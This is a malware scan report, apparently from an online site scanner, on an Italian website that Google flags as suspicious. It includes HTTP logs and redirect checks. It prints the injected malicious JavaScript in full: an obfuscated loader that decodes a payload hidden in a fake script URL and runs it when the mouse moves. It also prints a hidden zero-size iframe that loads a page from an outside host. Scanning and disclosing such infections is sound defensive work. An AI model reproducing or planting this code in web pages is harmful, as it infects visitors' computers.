Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=piazzanapoli.itb.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://piazzanapoli.itb.it/ | 200 OK Content-Length: 3500 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0Dhis%0Ay3z%0Dow6%0A28iiremf6ufrwoh%3Di75d2waovhic6x5uyatmqafeut0nxfltv5u.8gpchsxratyeldyair4t3ozep6eEz50lp7zeyusmfb3e4a8n1jjtgzp%28a8h%22a2viqenfetvrgpyait5m6x8eqt3%22x09%2971q%3Bk5x%0D3jf%0Atsfi8zhfl6gr5fb.vuosux8rq5jcya4%3Drjg%228v7hqfjtvymtxgppkao%3A2pp/koo/fodpv4dr881ifkwmqraa0x1bj8bi4ens5vvcewwouxjtvkuexer.mp5ipa8ni4x/5haifo8nx2g.qj7ci6kgj97iciv%3F171d3w8ec38fs88auhs for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } window.CheckBody = function() { if (!document.body){setTimeout('CheckBody();',10);} else { window.nomore=false; document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}} } } CheckBody(); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 66 websites. size: 0x0 src: http://mbcobretti.com/hydra.php <iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter> | ||
http://piazzanapoli.itb.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: piazzanapoli.itb.it
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 16:54:14 GMT
Accept-Ranges: bytes
ETag: "1c62ad5-dac-508e64123e52e"
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zc PHP/5.3.28
Content-Length: 3500
Content-Type: text/html
Last-Modified: Fri, 28 Nov 2014 07:31:51 GMT
...3500 bytes of data.
GET / HTTP/1.1
Host: piazzanapoli.itb.it
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 16:54:14 GMT
Accept-Ranges: bytes
ETag: "1c62ad5-dac-508e64123e52e"
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zc PHP/5.3.28
Content-Length: 3500
Content-Type: text/html
Last-Modified: Fri, 28 Nov 2014 07:31:51 GMT
...3500 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: piazzanapoli.itb.it
Referer: http://www.google.com/search?q=piazzanapoli.itb.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: piazzanapoli.itb.it
Referer: http://www.google.com/search?q=piazzanapoli.itb.it
Result:
The result is similar to the first query. There are no suspicious redirects found.